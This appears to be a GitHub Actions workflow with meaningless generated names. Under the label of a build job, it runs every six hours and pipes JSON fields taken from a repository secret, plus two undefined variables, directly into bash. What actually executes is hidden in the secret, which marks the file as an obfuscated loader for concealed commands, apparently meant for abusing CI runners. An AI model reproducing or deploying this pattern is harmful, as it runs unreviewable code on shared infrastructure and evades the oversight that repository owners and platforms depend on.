name: fabricatordispirited

on:
  workflow_dispatch:
  schedule:
    - cron: '27 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fabricatordispirited
        env:
          ug30: ${{ secrets.ug30 }}
        run: |
          echo $ug30 | jq -r .alqb53 | /bin/bash
          echo $zfdti322 | jq -r .r0927 | /bin/bash
          echo $b5356 | jq -r .kg0 | /bin/bash

